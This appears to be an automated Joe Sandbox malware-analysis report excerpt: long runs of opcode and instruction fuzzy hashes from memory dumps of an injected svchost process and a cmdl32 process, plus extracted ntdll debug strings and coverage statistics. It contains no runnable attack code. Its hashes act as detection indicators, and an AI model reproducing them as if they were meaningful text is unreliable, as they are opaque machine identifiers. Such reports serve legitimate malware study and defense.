                                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                        • Instruction ID: e6b1063d2d23711ac0d43cbc3afd2ae284f38cfe6b961503cde2a9b3389ba8ba
                                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                        • Instruction Fuzzy Hash: 83D0223231213093CB2CE6D46800F63AD05AF80AA4F0A00AC380AD3800C8088C82C2E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                        • Instruction ID: 02adc4d58c16dd82ba9f7b28e4e257c22cca9a0d2903e5ba261f8b78f55aa8ac
                                                                                        • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                        • Instruction Fuzzy Hash: 68D05E35945AC4CFE727CB08C165B907BF8F749B40F8910D8E04287BA2C37C9984CB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                        • Instruction ID: eb9e033027a3891ee232e60f2b6b20ed9d11edaa50639e63211638c6a0f712c2
                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                        • Instruction Fuzzy Hash: 3FC0123A290748AFC712EA98CD01F027BA9EB98B40F004061F2048BA70C671E820EA84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                        • Instruction ID: 267725e476671269c30ec3208ccc00b4b1b5956bd80acb6486e1b78b6004f5b2
                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                        • Instruction Fuzzy Hash: 60D01236100248EFCB01DF85C890DDA772AFBD8710F148019FD190B6108A31ED62DA50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                        • Instruction ID: c3eef8131cf127b254d0101ffe2eb05d233165d32f9020e660c8c5afd580d32b
                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                        • Instruction Fuzzy Hash: B0C04879B11A458FCF15EBAAD294F4977E8FB44740F1908D0E805DBB21E668F811CA11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c50324aba8d4f18421088d9a85102b1ea4a1cc003bed18f74713a350aa301588
                                                                                        • Instruction ID: 6158b953938e4fa65184f0695d7a8c08037a1e0db5d092e0d4ebae9a81823019
                                                                                        • Opcode Fuzzy Hash: c50324aba8d4f18421088d9a85102b1ea4a1cc003bed18f74713a350aa301588
                                                                                        • Instruction Fuzzy Hash: 97900231605804169140B29848C4586400697E0301BA5C051E1428558C8B148A5A5362
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ef4ffc9438c59e4dc37354358044a92ac3edc74cc375faf691723a69ea16141c
                                                                                        • Instruction ID: 3d1187d38bc563b7cbd4c17935b5997db336238ece7132160f66065a62b4beee
                                                                                        • Opcode Fuzzy Hash: ef4ffc9438c59e4dc37354358044a92ac3edc74cc375faf691723a69ea16141c
                                                                                        • Instruction Fuzzy Hash: 5490022124140C06D140B29884547470007C7D0701FA5C051A1028558D87168A6966B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e265b0bba5157aaca3da00da4293b1fc486099655846690ba24350ed6a0e77e8
                                                                                        • Instruction ID: 9338f67405f70701324fd1e09126289f1dfe839e626e3a3f6d771e9e89661978
                                                                                        • Opcode Fuzzy Hash: e265b0bba5157aaca3da00da4293b1fc486099655846690ba24350ed6a0e77e8
                                                                                        • Instruction Fuzzy Hash: 0F90022120184846D140B3984844B4F410687E1302FE5C059A515A558CCA1589595722
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f7c8a36977247652879f550ddee12b9578b4832790836c7c2fd1bdc5a9dcb8e9
                                                                                        • Instruction ID: e9d410e665175180e69b3e718fbebb68f90b96d91e671e58a0181feb56aaa57d
                                                                                        • Opcode Fuzzy Hash: f7c8a36977247652879f550ddee12b9578b4832790836c7c2fd1bdc5a9dcb8e9
                                                                                        • Instruction Fuzzy Hash: EF900261601504464140B2984844446600697E13013E5C155A1558564C87188959926A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 55b8cc4d39919cffa69eeb947e823d1b546fe9cfdf904133498191e4425c6da4
                                                                                        • Instruction ID: 462fb5687c83733fd99b6727755192341fd921f9fd980cd3e9d73034e817e194
                                                                                        • Opcode Fuzzy Hash: 55b8cc4d39919cffa69eeb947e823d1b546fe9cfdf904133498191e4425c6da4
                                                                                        • Instruction Fuzzy Hash: DC90023120140C06D104B29848446C6000687D0301FA5C051A7028659E976589957132
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57be65422121b3aae99a6192b79085ea92937f43b2e358562ce0a413452fd5a2
                                                                                        • Instruction ID: aeb0083f85f521cfc50d986b99ca2b242ee6568e5370659a94ca7e6c98eec3b6
                                                                                        • Opcode Fuzzy Hash: 57be65422121b3aae99a6192b79085ea92937f43b2e358562ce0a413452fd5a2
                                                                                        • Instruction Fuzzy Hash: 0290023160540C06D150B2984454786000687D0301FA5C051A1028658D87558B5976A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8c3ec4adfe2dfc28b3fad0a960952cc407efe6c96b6d11f4542b5d58d74b9ff7
                                                                                        • Instruction ID: baadac6c69362db8b3e1590f477fbf9c087852d8c3ecd9f8a537a422a6342e97
                                                                                        • Opcode Fuzzy Hash: 8c3ec4adfe2dfc28b3fad0a960952cc407efe6c96b6d11f4542b5d58d74b9ff7
                                                                                        • Instruction Fuzzy Hash: A790023120544C46D140B2984444A86001687D0305FA5C051A1068698D97258E59B662
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4c7312ddbb3afe5429c1155ced8956f1162fc0b6478b827c5c65c9913fb69af5
                                                                                        • Instruction ID: 7eb52d04d60ca75482778d91298d49fd108de93608ceab9f92ba9fe99ba145e6
                                                                                        • Opcode Fuzzy Hash: 4c7312ddbb3afe5429c1155ced8956f1162fc0b6478b827c5c65c9913fb69af5
                                                                                        • Instruction Fuzzy Hash: FE90023120140C06D180B298444468A000687D1301FE5C055A1029658DCB158B5D77A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8af71a0c041cae06db46504e0d89720cec618e9838dfc3b45fd3b2fd7f41c643
                                                                                        • Instruction ID: 2da6c230eff87bb7dbb46147d38c8aa6476482e71ed983d6d198c57b59f2d529
                                                                                        • Opcode Fuzzy Hash: 8af71a0c041cae06db46504e0d89720cec618e9838dfc3b45fd3b2fd7f41c643
                                                                                        • Instruction Fuzzy Hash: 2E9002A1201544964500F3988444B4A450687E0301BA5C056E2058564CC62589559136
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ebf286e65d6254d4643b7ad5fc3dd27d83fd5ab9063691c3b63abd3fd38549a
                                                                                        • Instruction ID: 3e612b026a88bdadf96c965caab8a10e5884b125d13caf99908ce47cebabe6c2
                                                                                        • Opcode Fuzzy Hash: 9ebf286e65d6254d4643b7ad5fc3dd27d83fd5ab9063691c3b63abd3fd38549a
                                                                                        • Instruction Fuzzy Hash: CF900225211404070105F6980744547004787D53513A5C061F2019554CD72189655122
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f3d26ac2590f53fb2e7b61db498c26019477f93d1602c4a3759645fc8133d5b5
                                                                                        • Instruction ID: 2e005e8dfcbf40f37e06f926d40a31ea7daba89fbdb403189a3af244ea1b028d
                                                                                        • Opcode Fuzzy Hash: f3d26ac2590f53fb2e7b61db498c26019477f93d1602c4a3759645fc8133d5b5
                                                                                        • Instruction Fuzzy Hash: D8900225221404060145F698064454B044697D63513E5C055F241A594CC72189695322
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 289bf1ffe0f8496261df41d343851d4143937c361b939e582aff7989bb602607
                                                                                        • Instruction ID: 7b53892a935c6c98fde2119ac745b18933cb459eba056d6fb0b0e582be190f68
                                                                                        • Opcode Fuzzy Hash: 289bf1ffe0f8496261df41d343851d4143937c361b939e582aff7989bb602607
                                                                                        • Instruction Fuzzy Hash: 2A90022124545506D150B29C44446564006A7E0301FA5C061A1818598D865589596222
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 99224844d09609cda847ec77872c587c77fb1478a8190df281f21249b47d4a8f
                                                                                        • Instruction ID: 71d17e0d2903fbab4afcaf945aa91b5834b15ebe84d9840b995263593ae47f91
                                                                                        • Opcode Fuzzy Hash: 99224844d09609cda847ec77872c587c77fb1478a8190df281f21249b47d4a8f
                                                                                        • Instruction Fuzzy Hash: DE90023120180806D100B298485474B000687D0302FA5C051A2168559D872589556572
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e6dfa647af551bed7951efa6bcec67c9c551ad7b537f6df5d1bf60dbe7f0bad2
                                                                                        • Instruction ID: a03f96251961d09c6a4d26868f6cdf0795f94211d39882ecdb03f438e23a7d82
                                                                                        • Opcode Fuzzy Hash: e6dfa647af551bed7951efa6bcec67c9c551ad7b537f6df5d1bf60dbe7f0bad2
                                                                                        • Instruction Fuzzy Hash: 7290023120180806D100B2984848787000687D0302FA5C051A6168559E8765C9956532
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 072dc0de41f7c182bed604b821e4c6485131f31f0d2ee29dc696c32059f34826
                                                                                        • Instruction ID: 1983b86864fdc9697310b1b4b75938a59cfe60ef6225062f04e6626637098400
                                                                                        • Opcode Fuzzy Hash: 072dc0de41f7c182bed604b821e4c6485131f31f0d2ee29dc696c32059f34826
                                                                                        • Instruction Fuzzy Hash: 34900221601404464140B2A888849464006ABE13117A5C161A199C554D865989695666
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d534d4c1d5ef82fc4430989d261844d9d939af3452edde1cec066700daabb25c
                                                                                        • Instruction ID: 06a82161c8354bf48f8a640caecd29b186795f737c55a36de0b728ea611bfb51
                                                                                        • Opcode Fuzzy Hash: d534d4c1d5ef82fc4430989d261844d9d939af3452edde1cec066700daabb25c
                                                                                        • Instruction Fuzzy Hash: 8E900221211C0446D200B6A84C54B47000687D0303FA5C155A1158558CCA1589655522
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: c49b10e7484e304360b164e7a8039be2190f65ad936d00172572865a8469e5c4
                                                                                        • Instruction ID: ea44d7a64406965c424ba81e8d099c5c2cf2a810920a2023199f903122d77852
                                                                                        • Opcode Fuzzy Hash: c49b10e7484e304360b164e7a8039be2190f65ad936d00172572865a8469e5c4
                                                                                        • Instruction Fuzzy Hash: 0C5109B5A0451ABFDF14DBDCC890A7EF7B9BB08204B1885E9E4A5D7641D338DE40CBA0
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038A4725
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 038A4787
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038A46FC
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038A4655
                                                                                        • Execute=1, xrefs: 038A4713
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038A4742
                                                                                        • ExecuteOptions, xrefs: 038A46A0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                        • API String ID: 0-484625025
                                                                                        • Opcode ID: b1bd6af37f2659520d0fe2cfc3b85f425ed3ea9f02cda2722d9371748d27511c
                                                                                        • Instruction ID: e52ea1b735e5ff404884de1d62f372543d7f53243a0cd35683fb27422a2c9b85
                                                                                        • Opcode Fuzzy Hash: b1bd6af37f2659520d0fe2cfc3b85f425ed3ea9f02cda2722d9371748d27511c
                                                                                        • Instruction Fuzzy Hash: 5951D93560071D6AEF20EAEDDC85FAE77BDAF04308F1400E9E505EB291E7719A45CB91
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-$0$0
                                                                                        • API String ID: 1302938615-699404926
                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                        • Instruction ID: 3316ce423bce16ca7a93c9f3c8cb72fd2850bd08a0de00fba1bff738255dfaf4
                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                        • Instruction Fuzzy Hash: 24817D74E052499BDF26CEE8C8917EEBBA7AF45390F1C42D9D861EB390C634D940CB51
                                                                                        Strings
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038A02BD
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038A02E7
                                                                                        • RTL: Re-Waiting, xrefs: 038A031E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                        • API String ID: 0-2474120054
                                                                                        • Opcode ID: 6ab6b3b2f8dee82805a31c8fa55b754634dfd4bc2facec305b44bd54ff0d7297
                                                                                        • Instruction ID: b4963e099d299ce799e09d7217ddc9e50fc3a5a67f077213b7d3343ea066b151
                                                                                        • Opcode Fuzzy Hash: 6ab6b3b2f8dee82805a31c8fa55b754634dfd4bc2facec305b44bd54ff0d7297
                                                                                        • Instruction Fuzzy Hash: 88E1AE70608B41DFE725CFA8C884B2AB7E5BF84314F184A99FAA5CB2D1D774D944CB42
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 038A7BAC
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 038A7B7F
                                                                                        • RTL: Resource at %p, xrefs: 038A7B8E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 0-871070163
                                                                                        • Opcode ID: 8d5cc2b34add04f66e3299f7f8cd25a35efaba9a5a4c91d5856404e741c3e82a
                                                                                        • Instruction ID: 9219514e924e12696a4a7af0d1eb93e0aa122d13dddbf6632ae0cfa50b7e7579
                                                                                        • Opcode Fuzzy Hash: 8d5cc2b34add04f66e3299f7f8cd25a35efaba9a5a4c91d5856404e741c3e82a
                                                                                        • Instruction Fuzzy Hash: CB41F2353007029FD725DEAACC40B6AB7E9EF88714F140AADF95ADB290DB30E405CB91
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038A728C
                                                                                        Strings
                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 038A7294
                                                                                        • RTL: Re-Waiting, xrefs: 038A72C1
                                                                                        • RTL: Resource at %p, xrefs: 038A72A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-605551621
                                                                                        • Opcode ID: ff61c9f397059b33bb4f171095d1bbc45bae6f7094b0dae384deaf21fb318b6c
                                                                                        • Instruction ID: f594f0b8acdde9b0d9b4e696bb51a9e2c1b22c610083e727e5974862240ec29d
                                                                                        • Opcode Fuzzy Hash: ff61c9f397059b33bb4f171095d1bbc45bae6f7094b0dae384deaf21fb318b6c
                                                                                        • Instruction Fuzzy Hash: 34412035700B46ABD721CEE9CC41B6AB7A5FF84718F1406A9F956EB240DB30E842C7D1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-
                                                                                        • API String ID: 1302938615-2137968064
                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                        • Instruction ID: 959df31c333e438215706cea0b2c4b36607ce99f27616b24cbaa405f23541278
                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                        • Instruction Fuzzy Hash: 8891C271E0020A9BDF24DEE9C981ABEB7A7EF44720F1845AAF865E72D0D730C941C750
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$@
                                                                                        • API String ID: 0-1194432280
                                                                                        • Opcode ID: 92eb790c79927d514117cfdd601353dc8ead7cecd239b9ee5e06f638073f1e5a
                                                                                        • Instruction ID: 0c82d0d49e48d688fc46f782253f15b9a9d859c4dd4245f2ce52013bc282fc4c
                                                                                        • Opcode Fuzzy Hash: 92eb790c79927d514117cfdd601353dc8ead7cecd239b9ee5e06f638073f1e5a
                                                                                        • Instruction Fuzzy Hash: 3F811976D002699BDB31DF94CC44BEEB6B8AB08710F0445EAE919F7680D7709E84CFA1
                                                                                        APIs
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 038BCFBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8
                                                                                        • String ID: @$@4Cw@4Cw
                                                                                        • API String ID: 4062629308-3101775584
                                                                                        • Opcode ID: c76abe0edd995484c0adaef074e5e38cfe5912e2e42bcf231c80b51c0aa5d778
                                                                                        • Instruction ID: d0707ef9548473c4af721de229b394c11a171557e9a77429c2b597ceb28b5320
                                                                                        • Opcode Fuzzy Hash: c76abe0edd995484c0adaef074e5e38cfe5912e2e42bcf231c80b51c0aa5d778
                                                                                        • Instruction Fuzzy Hash: 40418C79900729EFCB21EFE9D880AADBBB8EF45B04F0440AAE914DB354D774D805CB61

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.9%
                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                        Signature Coverage:2.3%
                                                                                        Total number of Nodes:440
                                                                                        Total number of Limit Nodes:70

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$'$*2$+!$+@$/<$8$;$?$B$Cb$DV$I$M'$O$`"$a#$eh$o7$xF$}
                                                                                        • API String ID: 0-3343627249
                                                                                        • Opcode ID: 154d989f762a1fde0e1558b32f55564310e4cf5a18a05437f539feca77e0f6a6
                                                                                        • Instruction ID: d2695e631d911612e468c4b7d3c5d4974d89dff9acfe003afed4ca6df11eb8eb
                                                                                        • Opcode Fuzzy Hash: 154d989f762a1fde0e1558b32f55564310e4cf5a18a05437f539feca77e0f6a6
